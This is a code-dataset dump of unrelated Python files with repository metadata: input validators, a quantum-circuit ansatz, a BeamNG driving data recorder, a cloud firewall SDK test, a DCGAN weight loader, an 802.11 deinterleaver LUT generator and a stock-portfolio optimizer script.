# pylint: disable=unused-argument # args defined by test definition
return match_is_domain_name(value)
def match_is_email_address(value):
"""Match the value matches the format of an email address.
Primary reference(s):
https://en.wikipedia.org/wiki/Email_address
    Note that the characters and character sequences allowed in the
    case of a quoted user part are likely still both over- and
    under-restrictive. Authoritatively parsing an email address is
    beyond the scope of these pre-packaged testers.
"""
# pylint: disable=too-many-return-statements, too-many-branches
if value is None or len(value) == 0:
return u'email address {0} cannot be empty'.format(repr(value))
partmatch = re.search('^(?P<userpart>.*)@(?P<domainpart>.*)$', value)
if not partmatch:
return u'"{0}" is not of the form username@domain'.format(value)
userpart, domainpart = partmatch.groups()
if len(userpart) == 0:
return u'{0} has empty userpart'.format(repr(value))
if len(userpart) >= 64:
return u'{0} has 64+ byte userpart'.format(repr(value))
if not userpart.startswith('"') or not userpart.endswith('"'):
match = re.search(r'([^A-Za-z0-9!#$%&\'*+/=?^_`{|}~.-])', userpart)
if match:
return u'{0} unquoted userpart cannot contain {1}'.format(
repr(value), repr(match.group(1)))
if userpart.startswith('.') or userpart.endswith('.'):
return u'{0} unquoted userpart cannot start or end with "."'.format(
repr(value))
if '..' in userpart:
return u'{0} unquoted userpart cannot contain ".."'.format(
repr(value))
else:
qcpart = userpart[1:-1]
match = re.search(
r'([^A-Za-z0-9!#$%&\'*+/=?^_`{|}~.(),:;<>@\[\]\ -])', qcpart)
if match:
return (
u'{0} userpart quoted content cannot contain "{1}"'.format(
repr(value), match.group(1)))
if len(domainpart) == 0:
return u'"{0} has empty domainpart'.format(value)
if len(domainpart) >= 63:
return u'"{0} has 63+ byte domainpart'.format(value)
test_domain_error = match_is_domain_name(domainpart)
if test_domain_error is not None:
return test_domain_error
return None
def is_email_address(conf, path, value):
"""Test that value matches the format of an email address."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_email_address(value)
def match_is_url(value):
"""Match the value against the format of a URL.
These patterns were derived from discussions on various websites;
most notably the following site deserves a lot of credit:
https://mathiasbynens.be/demo/url-regex
A pattern from that site has been tweaked through subsequent
experience and testing, but this test is best-effort and provides
nothing in the way of diagnostics.
"""
rexlist = [
r'^((?:[A-Za-z]{3,9}:(?:\/\/)?)' +
r'(?:[\-;:&=\+\$,\w]+@)?[A-Za-z0-9\.\-]+' +
r'(?::[0-9]+)?(?:(?:\/[\+~%\/\.\w\-_]*)?\??(?:[\-\+\/=&;%@\.\w_]*)#?' +
r'(?:[\.\!\/\\\w&=-]*))?)$',
r'^((?:www\.|[\-;:&=\+\$,\w]+@)[A-Za-z0-9\.\-]+' +
r'(?:(?:\/[\+~%\/\.\w\-_]*)?\??(?:[\-\+\/=&;%@\.\w_]*)' +
r'#?(?:[\.\!\/\\\w]*))?)$']
if value is None or len(value) == 0:
return u'url {0} cannot be empty'.format(repr(value))
for rex in rexlist:
if re.search(rex, value):
return None
return u'"{0}" was not recognized as a valid url'.format(value)
def is_url(conf, path, value):
"""Test that value matches the format of a URL."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_url(value)
def is_file_path(*ostests):
"""Create test of value against the given set of file-metadata properties.
One or more of the following ostest values can be given:
[!]exists: test that the path exists (!: not exist)
[!]isdir: test that the path is a directory (!: not a directory)
[!]isfile: test that the path is a file (!: not a file)
[!]islink: test that the path is a symbolic link (!: not a link)
[!]ismount: test that the path is a mount point (!: not a mount point)
They will be tested in the order given, so they can be strung
together to ensure a most helpful error message (e.g., exists,
isdir) to first test whether the path exists, so a non-existent
path will generate a "does not exist" error rather than the less
helpful "is not a directory" error.
"""
# pylint: disable=unused-argument # args defined by test definition
for ostest in ostests:
assert ostest in [
'exists', '!exists',
'isdir', '!isdir',
'isfile', '!isfile',
'islink', '!islink',
'ismount', '!ismount']
def is_file_path_test(conf, path, value):
res = []
for ostest in ostests:
if ostest == 'exists' and not os.path.exists(value):
res.append(u'"{0}" does not exist'.format(value))
elif ostest == '!exists' and os.path.exists(value):
res.append(u'"{0}" exists'.format(value))
elif ostest == 'isdir' and not os.path.isdir(value):
res.append(u'"{0}" is not a directory'.format(value))
elif ostest == '!isdir' and os.path.isdir(value):
res.append(u'"{0}" is a directory'.format(value))
elif ostest == 'isfile' and not os.path.isfile(value):
res.append(u'"{0}" is not a file'.format(value))
elif ostest == '!isfile' and os.path.isfile(value):
res.append(u'"{0}" is a file'.format(value))
elif ostest == 'islink' and not os.path.islink(value):
res.append(u'"{0}" is not a symlink'.format(value))
elif ostest == '!islink' and os.path.islink(value):
res.append(u'"{0}" is a symlink'.format(value))
elif ostest == 'ismount' and not os.path.ismount(value):
res.append(u'"{0}" is not a mount point'.format(value))
elif ostest == '!ismount' and os.path.ismount(value):
res.append(u'"{0}" is a mount point'.format(value))
if len(res) > 0:
return u' and '.join(res)
return None
return is_file_path_test
| 40.573379
| 80
| 0.614401
|
ebdbb4d99f1234c67a9d6887cc0c3694d0cced77
| 1,633
|
py
|
Python
|
qnn/ansatz/alternating_layer_tdcnot_ansatz.py
|
bjader/quantum-neural-network
|
3f23e14fac8700d3f48593f0727c6da59af5f77f
|
[
"MIT"
] | 9
|
2021-06-08T14:02:38.000Z
|
2022-03-08T10:14:22.000Z
|
qnn/ansatz/alternating_layer_tdcnot_ansatz.py
|
bjader/quantum-neural-network
|
3f23e14fac8700d3f48593f0727c6da59af5f77f
|
[
"MIT"
] | null | null | null |
qnn/ansatz/alternating_layer_tdcnot_ansatz.py
|
bjader/quantum-neural-network
|
3f23e14fac8700d3f48593f0727c6da59af5f77f
|
[
"MIT"
] | 1
|
2021-06-12T16:28:53.000Z
|
2021-06-12T16:28:53.000Z
|
from qiskit.circuit import Parameter
from ansatz.variational_ansatz import VariationalAnsatz
class AlternatingLayerTDCnotAnsatz(VariationalAnsatz):
"""
    A variational circuit ansatz. Prepares a quantum circuit object for a variational circuit consisting of thinly
    dressed C-NOT gates applied to pairs of qubits in an alternating layer pattern. A single sweep consists of two
    applications of thinly-dressed gates between nearest-neighbour qubits, with alternating pairs between the two
    applications. The thinly dressed C-NOT gate is defined in arXiv:2002.04612; we use single qubit Y rotations
    preceding and single qubit X rotations following the C-NOT gate.
"""
def __init__(self, layers, sweeps_per_layer, activation_function):
super().__init__(layers, sweeps_per_layer, activation_function)
def add_entangling_gates(self, n_data_qubits):
for i in range(n_data_qubits - 1)[::2]:
ctrl, tgt = i, ((i + 1) % self.qc.num_qubits)
self.build_tdcnot(ctrl, tgt)
for i in range(n_data_qubits)[1::2]:
ctrl, tgt = i, ((i + 1) % self.qc.num_qubits)
self.build_tdcnot(ctrl, tgt)
return self.qc
def build_tdcnot(self, ctrl, tgt):
params = [Parameter("ansatz{}".format(str(self.param_counter + j))) for j in range(4)]
self.qc.ry(params[0], self.qr[ctrl])
self.qc.ry(params[1], self.qr[tgt])
self.qc.cx(ctrl, tgt)
self.qc.rz(params[2], self.qr[ctrl])
self.qc.rz(params[3], self.qr[tgt])
self.param_counter += 4
def add_rotations(self, n_data_qubits):
pass
| 39.829268
| 114
| 0.68218
|
7e39818e45c2ed5d3f3e6dcbd5991319b5509f61
| 4,282
|
py
|
Python
|
DeepJanus-BNG/udacity_integration/train-dataset-recorder-brewer.py
|
zohdit/DeepJanus
|
c32022bdff2994e91df7af8af64a022d3e7e6a75
|
[
"MIT"
] | 7
|
2020-10-12T10:46:30.000Z
|
2021-06-23T10:42:30.000Z
|
DeepJanus-BNG/udacity_integration/train-dataset-recorder-brewer.py
|
zohdit/DeepJanus
|
c32022bdff2994e91df7af8af64a022d3e7e6a75
|
[
"MIT"
] | null | null | null |
DeepJanus-BNG/udacity_integration/train-dataset-recorder-brewer.py
|
zohdit/DeepJanus
|
c32022bdff2994e91df7af8af64a022d3e7e6a75
|
[
"MIT"
] | 2
|
2021-04-26T12:46:44.000Z
|
2021-09-16T08:27:53.000Z
|
import random
from time import sleep
from typing import Tuple, List
import numpy as np
from self_driving.beamng_brewer import BeamNGBrewer
from udacity_integration.beamng_car_cameras import BeamNGCarCameras
from self_driving.road_generator import RoadGenerator
from self_driving.beamng_tig_maps import maps
from self_driving.beamng_waypoint import BeamNGWaypoint
from self_driving.decal_road import DecalRoad
from udacity_integration.training_data_collector_and_writer import TrainingDataCollectorAndWriter
from self_driving.utils import get_node_coords
maps.install_map_if_needed()
STEPS = 5
# x is -y and *angle direction is reversed*
def get_rotation(road: DecalRoad):
v1 = road.nodes[0][:2]
v2 = road.nodes[1][:2]
v = np.subtract(v1, v2)
deg = np.degrees(np.arctan2([v[0]], [v[1]]))
return (0, 0, deg)
def get_script_point(p1, p2) -> Tuple[Tuple, Tuple]:
a = np.subtract(p2[0:2], p1[0:2])
# calculate the vector which length is half the road width
v = (a / np.linalg.norm(a)) * p1[3] / 4
# add normal vectors
r = p1[0:2] + np.array([v[1], -v[0]])
return tuple(r)
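# Added note: get_script_point above offsets each road point sideways, along a
# normal of the segment direction and scaled by the node's width component
# (p1[3]), so the AI guide points run parallel to the road centre line rather
# than sitting on top of it.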
# Calculate the points to guide the AI from the road points
def calculate_script(road_points):
script_points = [get_script_point(road_points[i], road_points[i + 1]) for i in range(len(road_points) - 1)]
assert(len(script_points) == len(road_points)-1)
# Get the last script point
script_points += [get_script_point(road_points[-1], road_points[-2])]
assert (len(script_points) == len(road_points))
orig = script_points[0]
script = [{'x': orig[0], 'y': orig[1], 'z': .5, 't': 0}]
i = 1
time = 0.18
# goal = len(street_1.nodes) - 1
# goal = len(brewer.road_points.right) - 1
goal = len(script_points) - 1
while i < goal:
node = {
# 'x': street_1.nodes[i][0],
# 'y': street_1.nodes[i][1],
# 'x': brewer.road_points.right[i][0],
# 'y': brewer.road_points.right[i][1],
'x': script_points[i][0],
'y': script_points[i][1],
'z': .5,
't': time,
}
script.append(node)
i += 1
time += 0.18
return script
def distance(p1, p2):
return np.linalg.norm(np.subtract(get_node_coords(p1), get_node_coords(p2)))
def run_sim(street_1: DecalRoad):
brewer = BeamNGBrewer(street_1.nodes)
waypoint_goal = BeamNGWaypoint('waypoint_goal', get_node_coords(street_1.nodes[-1]))
vehicle = brewer.setup_vehicle()
camera = brewer.setup_scenario_camera()
beamng = brewer.beamng
brewer.setup_road_nodes(street_1.nodes)
maps.beamng_map.generated().write_items(brewer.decal_road.to_json() + '\n' + waypoint_goal.to_json())
cameras = BeamNGCarCameras()
brewer.vehicle_start_pose = brewer.road_points.vehicle_start_pose()
#brewer.vehicle_start_pose = BeamNGPose()
sim_data_collector = TrainingDataCollectorAndWriter(vehicle, beamng, street_1, cameras)
brewer.bring_up()
print('bring up ok')
script = calculate_script(brewer.road_points.middle)
# Trick: we start from the road center
vehicle.ai_set_script(script[4:])
#vehicle.ai_drive_in_lane(True)
beamng.pause()
beamng.step(1)
def start():
for idx in range(1000):
if (idx * 0.05 * STEPS) > 3.:
sim_data_collector.collect_and_write_current_data()
dist = distance(sim_data_collector.last_state.pos, waypoint_goal.position)
if dist < 15.0:
beamng.resume()
break
# one step is 0.05 seconds (5/100)
beamng.step(STEPS)
try:
start()
finally:
beamng.close()
if __name__ == '__main__':
NODES = 20
MAX_ANGLE = 80
# MAX_ANGLE = 130
# MAX_ANGLE = 60
NUM_SPLINE_NODES = 20
SEG_LENGTH = 25
road = RoadGenerator(num_control_nodes=NODES, max_angle=MAX_ANGLE, seg_length=SEG_LENGTH,
num_spline_nodes=NUM_SPLINE_NODES).generate(visualise=False)
from self_driving.beamng_road_visualizer import plot_road
plot_road(road, save=True)
street = DecalRoad('street_1', drivability=1, material='').add_4d_points(road.sample_nodes)
run_sim(street)
| 29.736111
| 111
| 0.656936
|
bb1f1b63a5f1c397cdce0d33921ac4730ce35af9
| 1,150
|
py
|
Python
|
ecl/tests/functional/network/v2/test_firewall_action.py
|
keiichi-hikita/eclsdk
|
c43afb982fd54eb1875cdc22d46044644d804c4a
|
[
"Apache-2.0"
] | null | null | null |
ecl/tests/functional/network/v2/test_firewall_action.py
|
keiichi-hikita/eclsdk
|
c43afb982fd54eb1875cdc22d46044644d804c4a
|
[
"Apache-2.0"
] | null | null | null |
ecl/tests/functional/network/v2/test_firewall_action.py
|
keiichi-hikita/eclsdk
|
c43afb982fd54eb1875cdc22d46044644d804c4a
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from ecl.tests.functional import base
class TestFirewallAction(base.BaseFunctionalTest):
def test_01_reboot_firewall(self):
reboot = self.conn.network.reboot_firewall(
"5f29f0f4-ef23-484e-a81f-ea621175f1a3",
"HARD"
)
def test_02_reset_password(self):
resp = self.conn.network.reset_password_firewall(
"5f29f0f4-ef23-484e-a81f-ea621175f1a3",
"user-read"
)
        print(resp)
self.assertIsInstance(resp.new_password, six.string_types)
self.assertIsInstance(resp.username, six.string_types)
| 38.333333
| 75
| 0.714783
|
fde799c38c6dd4393baa13f11529d67e52c8ccd7
| 1,099
|
py
|
Python
|
scripts/model/__init__.py
|
heptaliane/DCGanImageGenerator
|
691f28a6fa8d141a9da7dce42a8bf507b39c75ed
|
[
"MIT"
] | null | null | null |
scripts/model/__init__.py
|
heptaliane/DCGanImageGenerator
|
691f28a6fa8d141a9da7dce42a8bf507b39c75ed
|
[
"MIT"
] | null | null | null |
scripts/model/__init__.py
|
heptaliane/DCGanImageGenerator
|
691f28a6fa8d141a9da7dce42a8bf507b39c75ed
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import torch
from .dcgan_generator import DCGanGenerator
from .dcgan_discriminator import DCGanDiscriminator
# Logging
from logging import getLogger, NullHandler
logger = getLogger(__name__)
logger.addHandler(NullHandler())
def _reshape_state_dict(src, target):
assert src.dim() == target.dim()
for d in range(src.dim()):
chunk = list(torch.chunk(src, src.shape[d], dim=d))
while len(chunk) < target.shape[d]:
chunk.extend(chunk)
src = torch.cat(chunk[:target.shape[d]], dim=d)
return src
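# Added note: _reshape_state_dict tiles or truncates `src` along every
# dimension until it matches `target`'s shape, e.g. reshaping a (2, 4) tensor
# against a (3, 4) target repeats the first row, giving rows [0, 1, 0].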
def load_pretrained_model(model, pretrained_path):
if not os.path.exists(pretrained_path):
return
logger.info('Load pretrained model (%s)', pretrained_path)
src = torch.load(pretrained_path)
dst = model.state_dict()
state = dict()
for k in dst.keys():
if k not in src:
state[k] = dst[k]
elif src[k].shape == dst[k].shape:
state[k] = src[k]
else:
state[k] = _reshape_state_dict(src[k], dst[k])
model.load_state_dict(state)
| 25.55814
| 62
| 0.640582
|
332f48ee48a686597c94d29190b8b58b8a1048e4
| 4,899
|
py
|
Python
|
scripts/gen_deinter_lut.py
|
andreaskuster/openofdm
|
0c39b31b808dd257cfc0696c8c4dd51dfd745edb
|
[
"Apache-2.0"
] | 1
|
2022-01-14T15:31:11.000Z
|
2022-01-14T15:31:11.000Z
|
scripts/gen_deinter_lut.py
|
bby0616/ofdm
|
8d9bfb692e9c1f45f9e3cf98eaef479616442716
|
[
"Apache-2.0"
] | null | null | null |
scripts/gen_deinter_lut.py
|
bby0616/ofdm
|
8d9bfb692e9c1f45f9e3cf98eaef479616442716
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Generate 802.11a/g/n Deinterleave LUT.
Output compensate for pucntureing.
"""
import argparse
import math
import os
import decode
"""
LUT ENTRY FORMAT
1 bit -- null_a
1 bit -- null_b
6 bit -- addra
6 bit -- addrb
3 bit -- bita
3 bit -- bitb
1 bit -- out_stb
1 bit -- done
-------------------
22 bits total
LUT FORMAT
+----------------+
| BASE ADDR |
| 32 ENTRY |
+----------------+
| 6 MBPS |
+----------------+
| 9 MBPS |
+----------------+
....
+----------------+
| MCS 0 |
+----------------+
...
+----------------+
| MCS 7 |
+----------------+
| PADDING |
+----------------+
"""
RATE_BITS = {
6: '1011',
9: '1111',
12: '1010',
18: '1110',
24: '1001',
36: '1101',
48: '1000',
54: '1100',
}
RATES = [
# (rate, mcs, ht)
(6, 0, False),
(9, 0, False),
(12, 0, False),
(18, 0, False),
(24, 0, False),
(36, 0, False),
(48, 0, False),
(54, 0, False),
(0, 0, True),
(0, 1, True),
(0, 2, True),
(0, 3, True),
(0, 4, True),
(0, 5, True),
(0, 6, True),
(0, 7, True),
]
def do_rate(rate=6, mcs=0, ht=False):
idx_map = decode.Decoder(None).deinterleave(None, rate=rate, mcs=mcs, ht=ht)
seq = [t[1] for t in idx_map]
erase = '1/2'
if ht:
n_bpsc = decode.HT_MCS_PARAMETERS[mcs][0]
if mcs in [2, 4, 6]:
erase = '3/4'
pass
elif mcs == 5:
erase = '2/3'
pass
elif mcs == 7:
erase = '5/6'
else:
n_bpsc = decode.RATE_PARAMETERS[rate][0]
if rate in [9, 18, 36]:
erase = '3/4'
elif rate == 48:
erase = '2/3'
data = []
i = 0
puncture = 0
while i < len(seq):
addra = seq[i] // n_bpsc
bita = seq[i] % n_bpsc
if i + 1 < len(seq):
addrb = seq[i + 1] // n_bpsc
bitb = seq[i + 1] % n_bpsc
else:
addrb = 0
bitb = 0
base = (addra << 14) + (addrb << 8) + (bita << 5) + (bitb << 2) + (1 << 1)
if erase == '1/2':
mask = base
data.append(mask)
elif erase == '3/4':
if puncture == 0:
mask = base
data.append(mask)
puncture = 1
else:
mask = (1 << 20) + base
data.append(mask)
mask = (1 << 21) + base
data.append(mask)
puncture = 0
elif erase == '2/3':
if puncture == 0:
mask = base
data.append(mask)
puncture = 1
else:
mask = (1 << 20) + base
data.append(mask)
i -= 1
puncture = 0
elif erase == '5/6':
if puncture == 0:
mask = base
data.append(mask)
puncture = 1
elif puncture == 1:
mask = (1 << 20) + base
data.append(mask)
mask = (1 << 21) + base
data.append(mask)
puncture = 2
else:
mask = (1 << 20) + base
data.append(mask)
mask = (1 << 21) + base
data.append(mask)
puncture = 0
i += 2
# reset addra to NUM_SUBCARRIER/2
if ht:
mask = (26 << 14) + 1
else:
mask = (24 << 14) + 1
data.append(mask)
# sentinel
data.extend([0] * 4)
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--out')
args = parser.parse_args()
if args.out is None:
args.out = os.path.join(os.getcwd(), 'deinter_lut.mif')
coe_out = '%s.coe' % (os.path.splitext(args.out)[0])
header = [0] * 32
lut = []
offset = 32
for rate, mcs, ht in RATES:
if ht:
idx = (1 << 4) + mcs
else:
idx = int(RATE_BITS[rate], 2)
header[idx] = offset
print('[rate=%d, mcs=%d] -> %d' % (rate, mcs, offset))
data = do_rate(rate=rate, mcs=mcs, ht=ht)
offset += len(data)
lut.extend(data)
total = int(2 ** math.ceil(math.log(offset, 2)))
print('Total row: %d (round up to %d)' % (offset, total))
lut.extend([0] * (total - offset))
with open(args.out, 'w') as f:
for l in header + lut:
f.write('{0:022b}\n'.format(l))
print("MIL file saved as %s" % (args.out))
with open(coe_out, 'w') as f:
f.write('memory_initialization_radix=2;\n')
f.write('memory_initialization_vector=\n')
f.write(',\n'.join(['{0:022b}'.format(l) for l in header + lut]))
f.write(';')
print("COE file saved as %s" % (coe_out))
if __name__ == '__main__':
main()
| 21.581498
| 82
| 0.423352
|
4df63b98a03ecc20ec1bb3b9f03fc78127edd480
| 2,901
|
py
|
Python
|
StockPortfolio/runportfolio.py
|
jedpittman/python_samples
|
e3d0271e10cf981f7a0ff39f1e28edf26c12bcef
|
[
"MIT"
] | null | null | null |
StockPortfolio/runportfolio.py
|
jedpittman/python_samples
|
e3d0271e10cf981f7a0ff39f1e28edf26c12bcef
|
[
"MIT"
] | null | null | null |
StockPortfolio/runportfolio.py
|
jedpittman/python_samples
|
e3d0271e10cf981f7a0ff39f1e28edf26c12bcef
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import requests
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
#load the data
# from google.colab import files
# files.upload()
# Store the data
df = pd.read_csv("data\FakeStockData.csv")
# df = pd.read_csv('NUSE_Close.csv')
#df # show the data frame.
# Should be this form:
# Date | Symbol1 | symbol2 ... etc.
# for each symbol, should be a close price.
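# Hypothetical illustration of that layout (tickers and prices are made up):
#   Date,AAA,BBB
#   2020-01-02,10.00,25.10
#   2020-01-03,10.20,24.95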
# Set the date as the index
df = df.set_index(pd.DatetimeIndex(df['Date'].values))
# Remove the date column from the df
# columns = axis 1
df.drop(columns=['Date'], axis=1, inplace=True)
#print(df)
#df
#exit(1)
# Calculate the expected annualized returns and the annualized
# sample covariance matrix of the daily asset returns.
mu = expected_returns.mean_historical_return(df)
S = risk_models.sample_cov(df)
# SR describes the excess return you get for volatility you endure holding
# a riskier asset.
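# Added note: the Sharpe ratio is (expected portfolio return - risk-free rate)
# divided by portfolio volatility; ef.max_sharpe() below searches the efficient
# frontier for the weight vector that maximizes it.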
ef = EfficientFrontier(mu, S) # create the EF object
weights = ef.max_sharpe() # Get the raw weights
# this will set weights below cutoff to zero, rounding the rest.
cleaned_weights = ef.clean_weights()
print(cleaned_weights)
#show the expected return, SR, and
# in a jupyter notebook, this shows an ordered dicts.
# should sum to 1 for all weights.
ef.portfolio_performance(verbose=True)
#Figure out the allocations for each stock.
# pip install pulp
#Get the discrete allocation of each share per stock
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
portfolio_val = 5000 # how much to invest
latest_prices = get_latest_prices(df)
weights = cleaned_weights
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_val)
allocation, leftover = da.lp_portfolio()
# Returns a dictionary with pairs ticker: #shares
# Returns 1 leftover.
print('Discrete allocation:', allocation)
print("leftovers: ",leftover)
exit(1)
"""
# Get company name for stock ticker
def get_company_name(symbol):
    url = 'http://d.yimg.com/autoc.finance.yahoo.com/autoc?query=' + symbol + '&region=1&lang=en'
result = requests.get(url).json()
for r in result['ResultSet']['Result']:
if r['symbol'] == symbol:
return r['name']
# Store the company name into a list.
company_name = []
for symbol in allocation:
company_name.append( get_company_name(symbol))
# Get the discrete allocation values
discrete_allocation_list = []
for symbol in allocation:
    discrete_allocation_list.append(allocation.get(symbol))
# Create a dataframe for the portfolio
portfolio_df = pd.DataFrame(columns=['Company_name', 'Company_ticker', 'Discrete_val_' + str(portfolio_val)])
portfolio_df['Company_name'] = company_name
portfolio_df['Company_ticker'] = allocation
portfolio_df['Discrete_val' + str(portfolio_val)] = discrete_allocation_list
# Show it.
portfolio_df
"""
| 29.30303
| 109
| 0.759393
|